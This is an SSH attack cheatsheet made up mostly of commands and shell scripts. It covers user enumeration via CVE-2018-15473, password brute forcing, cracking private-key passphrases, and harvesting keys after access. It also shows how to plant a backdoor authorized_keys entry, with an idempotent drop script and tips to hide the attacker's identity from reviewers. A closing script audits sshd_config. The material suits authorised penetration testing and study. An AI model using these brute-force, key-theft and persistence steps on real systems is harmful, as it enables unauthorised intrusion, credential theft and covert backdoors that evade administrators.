SSH Enumeration Cheatsheet
Default Port: 22 (TCP)
Banner & Info Gathering
nc -nv <ip> 22 # Banner grab
ssh -v <user>@<ip> # Verbose handshake output
ssh -V # Local SSH client version
# Nmap scripts
nmap -p 22 -sV <ip>
nmap -p 22 --script ssh-hostkey <ip>
nmap -p 22 --script ssh2-enum-algos <ip>
nmap -p 22 --script ssh-auth-methods \
--script-args ssh.user=<user> <ip>
nmap -p 22 --script sshv1 <ip> # Check for insecure SSHv1
ssh-audit (Configuration Security Check)
ssh-audit <ip>
ssh-audit <ip> -p 22
# Flags to note:
# [fail] = critical issue
# [warn] = should be fixed
# Lists: KEX, hostkey, encryption, MAC algorithms
User Enumeration
# CVE-2018-15473: username enumeration in OpenSSH up to and including 7.7 (fixed in 7.8).
# Distro builds backport the fix without changing the banner, so the version is a hint, not proof
python3 ssh_user_enum.py --userList users.txt --ip <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS <ip>
set USER_FILE users.txt
run
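Banner triage as a script, an added example for this cheatsheet rather than any tool the page lists: it parses the `SSH-<proto>-<software>` identification strings that `nc`, `ssh-keyscan` and `nmap -sV` return, flags hosts still offering protocol 1, and flags OpenSSH builds whose advertised version is 7.7 or lower as candidates for the CVE-2018-15473 check. The four banners in `SAMPLE_BANNERS` are constructed, and the backport caveat in the comments is why the function says candidate rather than vulnerable.

```sh
#!/bin/sh
# Offline triage of SSH identification strings ("SSH-<protoversion>-<software> [comment]").
# Example code added for this cheatsheet, not part of any tool it lists.
# Caveat: distributions backport fixes without bumping the version in the banner,
# so a hit from openssh_user_enum_candidate is something to test, not a finding.

# Constructed sample banners (not captured from real hosts)
SAMPLE_BANNERS='SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
SSH-1.99-OpenSSH_5.3
SSH-2.0-dropbear_2019.78'

# ssh_software "<banner>": the software string after "SSH-<proto>-", comment dropped
ssh_software() {
    printf '%s\n' "$1" | sed -n 's/^SSH-[0-9.]*-\([^ ]*\).*/\1/p'
}

# openssh_version "<banner>": "major.minor" for OpenSSH banners; exit 1 for anything else
openssh_version() {
    v=$(printf '%s\n' "$1" | sed -n 's/^SSH-[0-9.]*-OpenSSH_\([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1.\2/p')
    [ -n "$v" ] || return 1
    printf '%s\n' "$v"
}

# openssh_user_enum_candidate "<banner>": exit 0 when the banner advertises OpenSSH <= 7.7,
# the range CVE-2018-15473 applies to (fixed upstream in 7.8)
openssh_user_enum_candidate() {
    v=$(openssh_version "$1") || return 1
    major=${v%%.*}; minor=${v#*.}
    [ "$major" -lt 7 ] || { [ "$major" -eq 7 ] && [ "$minor" -le 7 ]; }
}

# sshv1_offered "<banner>": exit 0 for protoversion 1.x; "1.99" means v1 and v2 are both accepted
sshv1_offered() {
    case "$1" in
        SSH-1.*) return 0 ;;
        *)       return 1 ;;
    esac
}

# triage_banners: one line per banner in SAMPLE_BANNERS with the flags it raises
triage_banners() {
    printf '%s\n' "$SAMPLE_BANNERS" | while IFS= read -r b; do
        flags=""
        sshv1_offered "$b" && flags="$flags sshv1"
        openssh_user_enum_candidate "$b" && flags="$flags CVE-2018-15473-candidate"
        printf '%-45s %-25s%s\n' "$b" "$(ssh_software "$b")" "${flags:- none}"
    done
}

triage_banners
```

Feed it real banners by replacing `SAMPLE_BANNERS` with the output of `ssh-keyscan -f hosts.txt 2>&1 | grep '^#'` stripped of its `# host:port ` prefix, or with `nmap -sV` service strings.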
Brute Force
# Hydra (keep -t at 4 for ssh: sessions beyond sshd's MaxStartups are simply dropped,
# and every failure still counts toward MaxAuthTries and lockout tools such as fail2ban)
hydra -l <user> -P wordlist.txt -t 4 ssh://<ip>
hydra -L users.txt -P wordlist.txt -t 4 ssh://<ip>
hydra -l <user> -P wordlist.txt -t 4 -s 2222 ssh://<ip> # Custom port
# Medusa
medusa -h <ip> -u <user> -P wordlist.txt -M ssh
# Nmap
nmap -p 22 --script ssh-brute <ip>
nmap -p 22 --script ssh-brute \
--script-args userdb=users.txt,passdb=pass.txt <ip>
# Metasploit
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <ip>
set USERNAME <user>
set PASS_FILE wordlist.txt
run
Key-Based Attacks
# Connect with private key (ssh rejects a key file readable by others: "UNPROTECTED PRIVATE KEY FILE")
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip>
ssh -i id_rsa -o IdentitiesOnly=yes <user>@<ip> # Offer only this key, so agent keys do not burn MaxAuthTries first
# Crack passphrase on private key
ssh2john id_rsa > ssh_hash.txt
john --wordlist=wordlist.txt ssh_hash.txt # john's SSH format covers every $sshng$N$ variant
# hashcat needs the bare hash (drop the "id_rsa:" prefix) and a mode matching the $sshng$N$
# prefix ssh2john emits, which encodes the key file's cipher/format, not the key algorithm:
ssh2john id_rsa | cut -d: -f2- > ssh_hash.txt
hashcat -m 22911 ssh_hash.txt wordlist.txt # $sshng$0$: legacy PEM with 3DES (old "BEGIN RSA PRIVATE KEY" files)
hashcat -m 22921 ssh_hash.txt wordlist.txt # $sshng$6$: new OpenSSH format, bcrypt KDF (all Ed25519 keys, any recent ssh-keygen output)
# Other prefixes: 22931 ($1$/$3$), 22941 ($4$), 22951 ($5$); confirm against hashcat --example-hashes
# Scan for keys (key harvesting after initial access); names are only a hint, so also match on the header
find / -type f \( -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" \) 2>/dev/null
find / -type f \( -name "*.pem" -o -name "*.key" -o -name "*.ppk" \) 2>/dev/null
grep -rl -- "-----BEGIN .*PRIVATE KEY-----" /home /root /etc /opt /var 2>/dev/null
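The `find` lines above only catch keys that kept their default names. The script below is an added example for this cheatsheet (not a tool the page references): it locates private keys by their header line, works out the on-disk format, including whether a new-format OpenSSH key carries a passphrase by decoding its armor and reading the cipher and KDF names, and maps each file to the ssh2john/hashcat step it needs. `make_samples` writes constructed stand-in files with genuine headers and garbage key material so the script runs offline; the `$sshng$N$`-to-mode mapping in `crack_hint` is the one from the section above.

```sh
#!/bin/sh
# Private-key triage for harvested files: find keys by header, not name; report the
# on-disk format; say whether a passphrase stands between you and using the key.
# Example code added for this cheatsheet. The "keys" make_samples writes are
# constructed stand-ins (correct headers, garbage material), not real key pairs.

# find_private_keys <dir>: paths whose first line is a private-key header
find_private_keys() {
    find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        case "$(head -n 1 "$f" 2>/dev/null)" in
            '-----BEGIN OPENSSH PRIVATE KEY-----'|'-----BEGIN RSA PRIVATE KEY-----'|\
            '-----BEGIN DSA PRIVATE KEY-----'|'-----BEGIN EC PRIVATE KEY-----'|\
            '-----BEGIN PRIVATE KEY-----'|'-----BEGIN ENCRYPTED PRIVATE KEY-----'|\
            'PuTTY-User-Key-File-'*) printf '%s\n' "$f" ;;
        esac
    done
}

# key_format <file>: openssh-v1/<cipher>/<kdf> | pem/<DEK cipher> | pem/plain |
#                    pkcs8/encrypted | pkcs8/plain | putty | unknown
# New OpenSSH format: decode the armor and read the two length-prefixed strings after
# the "openssh-key-v1\0" magic (ciphername, kdfname). "none" means no passphrase.
key_format() {
    f=$1
    case "$(head -n 1 "$f")" in
        '-----BEGIN OPENSSH PRIVATE KEY-----')
            fields=$(sed '/^-----/d' "$f" | base64 -d 2>/dev/null | head -c 64 |
                     tr -cs '[:print:]' '\n' |
                     awk 'NR == 2 { c = $0 } NR == 3 { print c "/" $0; exit }')
            printf 'openssh-v1/%s\n' "$fields" ;;
        '-----BEGIN ENCRYPTED PRIVATE KEY-----') echo pkcs8/encrypted ;;
        '-----BEGIN PRIVATE KEY-----')           echo pkcs8/plain ;;
        'PuTTY-User-Key-File-'*)                 echo putty ;;
        '-----BEGIN '*' PRIVATE KEY-----')
            # legacy PEM: a passphrase shows up as Proc-Type/DEK-Info header lines
            if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then
                printf 'pem/%s\n' "$(sed -n 's/^DEK-Info: *\([^,]*\),.*/\1/p' "$f")"
            else
                echo pem/plain
            fi ;;
        *) echo unknown ;;
    esac
}

# crack_hint <file>: next step, keyed on the $sshng$N$ prefix ssh2john emits for each format
crack_hint() {
    case "$(key_format "$1")" in
        openssh-v1/none/none|pem/plain|pkcs8/plain)
            echo 'no passphrase: use with ssh -i directly' ;;
        openssh-v1/aes256-ctr/bcrypt)
            echo 'ssh2john -> $sshng$6$ -> hashcat -m 22921 (or john --format=SSH)' ;;
        pem/DES-EDE3-CBC)
            echo 'ssh2john -> $sshng$0$ -> hashcat -m 22911 (or john --format=SSH)' ;;
        openssh-v1/*|pem/*)
            echo 'ssh2john -> john --format=SSH; match the $sshng$N$ prefix to a hashcat mode' ;;
        pkcs8/encrypted) echo 'PKCS#8: pem2john -> john (hashcat has separate PKCS#8 modes)' ;;
        putty)  echo 'putty2john -> john; puttygen -O private-openssh once the passphrase is known' ;;
        *)      echo 'not a recognised private key' ;;
    esac
}

# make_samples <dir>: constructed sample files (NOT real keys) covering the cases above
make_samples() {
    d=$1; mkdir -p "$d/.ssh" "$d/backup"
    { echo '-----BEGIN OPENSSH PRIVATE KEY-----'   # new format, no passphrase
      printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none\000\000\000\000junk-not-a-key' | base64
      echo '-----END OPENSSH PRIVATE KEY-----'; } > "$d/.ssh/id_ed25519"
    { echo '-----BEGIN OPENSSH PRIVATE KEY-----'   # new format, aes256-ctr + bcrypt, renamed
      printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt\000\000\000\030junk-salt-junk-salt-junk' | base64
      echo '-----END OPENSSH PRIVATE KEY-----'; } > "$d/backup/notes.txt"
    { echo '-----BEGIN RSA PRIVATE KEY-----'       # legacy PEM, 3DES passphrase
      echo 'Proc-Type: 4,ENCRYPTED'
      echo 'DEK-Info: DES-EDE3-CBC,0123456789ABCDEF'
      echo ''
      echo 'anVuay1ub3QtYS1yZWFsLWtleQ=='
      echo '-----END RSA PRIVATE KEY-----'; } > "$d/backup/server.pem"
    echo 'ssh-ed25519 NOTAREALKEYBLOB user@host' > "$d/.ssh/id_ed25519.pub"   # must be ignored
    echo 'hello' > "$d/README"                                                 # must be ignored
}

# triage <dir>: path, format, next step for every key found
triage() {
    find_private_keys "$1" | while IFS= read -r k; do
        printf '%s\t%s\t%s\n' "$k" "$(key_format "$k")" "$(crack_hint "$k")"
    done
}

demo=$(mktemp -d); make_samples "$demo"; triage "$demo"; rm -rf "$demo"
```

Point `triage` at `/home`, `/root` or a pulled backup instead of the demo directory; the 64 KiB size cap keeps `head` from opening large binaries.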
SSH Key Scanning
# Collect host keys
ssh-keyscan <ip>
ssh-keyscan -t rsa,ecdsa,ed25519 <ip>
ssh-keyscan -p 2222 <ip>
# Scan a host list, then look for host keys shared between hosts (cloned images or copied /etc/ssh)
ssh-keyscan -f hosts.txt > known_hosts
ssh-keygen -lf known_hosts | awk '{print $2}' | sort | uniq -d # Fingerprints seen more than once
Interesting Files to Grab Post-Access
~/.ssh/id_rsa, id_ecdsa, id_ed25519 # Private keys (check every home directory and /root)
~/.ssh/id_rsa.pub # Public key (the comment field usually names user@host)
~/.ssh/authorized_keys # Authorized keys (add yours for persistence); from=/command= options limit what a key may do
~/.ssh/known_hosts # Previous connections (network map); if HashKnownHosts was on, query with ssh-keygen -F <host>
~/.ssh/config # Host aliases, usernames, IdentityFile paths, ProxyJump hosts
/etc/ssh/sshd_config # Server configuration
/etc/ssh/ssh_host_rsa_key # Host private key (impersonate this server to clients that trust it)
Add Backdoor SSH Key (Post-Exploitation)
# On attacker machine (-C sets the comment; the default user@host would name your box in the victim's file)
ssh-keygen -t rsa -b 4096 -N "" -C "deploy" -f backdoor
# On target: with StrictModes (default yes) sshd ignores authorized_keys unless ~/.ssh is 0700 and the file 0600
mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Connect back
ssh -i backdoor <user>@<ip>
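The same drop as a function with the checks sshd applies, added here as an example (not taken from any tool on the page): it creates `~/.ssh` with the modes `StrictModes` requires, refuses input that is not a public-key line, and does not append a key that is already present, so a re-run leaves no duplicate line for a reviewer to notice. `SAMPLE_PUBKEY` is a constructed placeholder, and a temporary directory stands in for the target user's home.

```sh
#!/bin/sh
# Idempotent authorized_keys drop that satisfies sshd's default StrictModes yes:
# ~/.ssh 0700, authorized_keys 0600, and (not fixable from here) the home directory
# itself not group/world-writable. Example code added for this cheatsheet; the key
# below is a constructed placeholder, not real key material.
SAMPLE_PUBKEY='ssh-ed25519 AAAAnotARealKeyBlobAAAA deploy'

# valid_pubkey_line "<line>": exit 0 for "<known type> <base64 blob> [comment]"
valid_pubkey_line() {
    ktype=${1%% *}
    rest=${1#* }
    blob=${rest%% *}
    case "$ktype" in
        ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp256|ecdsa-sha2-nistp384|ecdsa-sha2-nistp521|\
        sk-ssh-ed25519@openssh.com|sk-ecdsa-sha2-nistp256@openssh.com) ;;
        *) return 1 ;;
    esac
    [ "$rest" != "$1" ] && printf '%s\n' "$blob" | grep -Eq '^[A-Za-z0-9+/]+=*$'
}

# install_authorized_key <home dir> "<pubkey line>": 0 added, 2 already present, 1 refused
install_authorized_key() {
    home=$1; line=$2
    dir=$home/.ssh; file=$dir/authorized_keys
    valid_pubkey_line "$line" || { echo "refusing: not a public key line" >&2; return 1; }
    mkdir -p "$dir" && chmod 700 "$dir"
    [ -f "$file" ] || : > "$file"
    chmod 600 "$file"
    # compare on type+blob only: the same key with another comment is still the same key
    blob=$(printf '%s\n' "$line" | awk '{ print $1 " " $2 }')
    if awk -v b="$blob" '($1 " " $2) == b { found = 1 } END { exit !found }' "$file"; then
        return 2
    fi
    printf '%s\n' "$line" >> "$file"
}

# Demo against a throwaway home directory
demo=$(mktemp -d)
install_authorized_key "$demo" "$SAMPLE_PUBKEY" && echo "first run: added"
install_authorized_key "$demo" "$SAMPLE_PUBKEY" || echo "second run: rc=$? (already present)"
cat "$demo/.ssh/authorized_keys"
rm -rf "$demo"
```

Replace the demo directory with the target user's home; if `sshd_config` sets a custom `AuthorizedKeysFile`, the file path in the function has to follow it.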
Common Misconfigurations to Check
# grep the file for these, or run sshd -T as root to print the effective values (defaults filled in, Match blocks resolved)
PermitRootLogin yes — Root login with a password allowed (default since 7.0 is prohibit-password: key only)
PasswordAuthentication yes — Passwords accepted (brutable); this is the default, so an absent line means yes
PermitEmptyPasswords yes — Blank passwords allowed
PubkeyAuthentication no — Key auth off, so every account is reachable only by password
AuthorizedKeysFile — Default .ssh/authorized_keys; a custom path (e.g. /etc/ssh/authorized_keys/%u) changes where a dropped key must go and who can write it
AllowUsers / DenyUsers / AllowGroups — User restrictions; the allow-list doubles as a target list
AllowTcpForwarding yes — Port forwarding (-L/-R/-D) available for pivoting (default yes)
Port — A non-standard port is obscurity, not a control; scan all ports (-p-) instead of assuming 22
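Grepping `sshd_config` for these keywords gives wrong answers when the keyword is commented out, duplicated, written in another case, set with `key=value`, or only set inside a `Match` block. The script below is an added example for this cheatsheet (not part of OpenSSH or any tool listed here): `effective_value` resolves a keyword's global value using sshd's own rules, falling back to OpenSSH's compiled-in default when the keyword is absent, and `audit_sshd_config` applies the verdicts from the list above to a constructed sample config.

```sh
#!/bin/sh
# Resolve the global (pre-Match) value of sshd_config keywords the way sshd does:
# keywords are case-insensitive, "key=value" is accepted, the FIRST occurrence wins,
# everything after the first "Match" line is conditional, and an absent keyword takes
# the compiled-in default. Example code added for this cheatsheet; the config below is
# a constructed sample. On the target, `sshd -T` (root) prints the same effective values.

SAMPLE_SSHD_CONFIG='# constructed sample sshd_config
Port 2222
#PermitRootLogin prohibit-password
permitrootlogin yes
PasswordAuthentication no
# the duplicate below is ignored by sshd: the first occurrence wins
PasswordAuthentication yes
AllowUsers deploy admin
Match User backup
    PasswordAuthentication yes
    PermitEmptyPasswords yes
'

# sshd_default <lowercase keyword>: OpenSSH default used when the keyword is absent
sshd_default() {
    case "$1" in
        port)                   echo 22 ;;
        permitrootlogin)        echo prohibit-password ;;
        passwordauthentication) echo yes ;;
        permitemptypasswords)   echo no ;;
        pubkeyauthentication)   echo yes ;;
        allowtcpforwarding)     echo yes ;;
        x11forwarding)          echo no ;;
        *)                      echo '(unset)' ;;
    esac
}

# effective_value "<config text>" <keyword>: global value, or the default if absent
effective_value() {
    key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    v=$(printf '%s\n' "$1" | awk -v key="$key" '
        { line = $0; sub(/^[[:space:]]+/, "", line); sub(/[[:space:]]+$/, "", line) }
        line ~ /^(#|$)/ { next }                          # comment or blank line
        { k = line; sub(/[[:space:]=].*/, "", k); k = tolower(k) }
        k == "match" { exit }                             # conditional section starts here
        k == key { sub(/^[^[:space:]=]+[[:space:]=]*/, "", line); print line; exit }
    ')
    if [ -n "$v" ]; then printf '%s\n' "$v"; else sshd_default "$key"; fi
}

# audit_sshd_config "<config text>": one verdict line per keyword of interest
audit_sshd_config() {
    cfg=$1
    for kw in Port PermitRootLogin PasswordAuthentication PermitEmptyPasswords \
              PubkeyAuthentication AllowTcpForwarding AllowUsers; do
        v=$(effective_value "$cfg" "$kw")
        case "$kw/$v" in
            PermitRootLogin/yes)        tag='[fail] root login with password' ;;
            PermitEmptyPasswords/yes)   tag='[fail] blank passwords accepted' ;;
            PasswordAuthentication/yes) tag='[warn] password auth: brute-forceable' ;;
            PubkeyAuthentication/no)    tag='[warn] no key auth: passwords are the only way in' ;;
            AllowTcpForwarding/yes)     tag='[info] port forwarding usable for pivoting' ;;
            Port/22)                    tag='[info] default port' ;;
            Port/*)                     tag='[info] non-standard port' ;;
            'AllowUsers/(unset)')       tag='[info] no user allow-list' ;;
            AllowUsers/*)               tag='[info] allow-list doubles as a target list' ;;
            *)                          tag='[ok]' ;;
        esac
        printf '%-24s %-20s %s\n' "$kw" "$v" "$tag"
    done
}

audit_sshd_config "$SAMPLE_SSHD_CONFIG"
```

To audit a real file: `audit_sshd_config "$(cat /etc/ssh/sshd_config)"`; values set only inside `Match` blocks are deliberately not reported, because they apply to some connections and not others.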